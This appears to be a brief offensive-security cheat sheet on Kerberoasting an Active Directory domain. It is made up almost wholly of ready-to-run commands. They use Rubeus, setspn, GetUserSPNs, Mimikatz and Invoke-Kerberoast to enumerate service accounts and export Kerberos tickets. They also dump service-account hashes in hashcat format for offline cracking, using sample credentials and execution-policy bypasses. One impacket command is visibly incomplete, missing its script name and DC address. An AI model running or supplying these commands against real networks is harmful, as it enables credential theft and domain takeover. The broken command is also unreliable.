If an account has SPN (Service Principal Name) set. We can request that account hash and try to crack it locally

For kerberos to work, times have to be within 5 minutes between attacker and victim.


.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrap

Getting SPNs

There are many ways to do it.

setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/ -request  -target-domain ecorp.local ecorp/morph3:Password123@ -dc-ip


Listing cached tickets

Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"

Extracting tickets

Invoke-Mimikatz -Command '"kerberos::list /export"'


This powershell script is always my go to. It works pretty fine

powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
powershell.exe -ep bypass -nop
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerberoast.txt

Last updated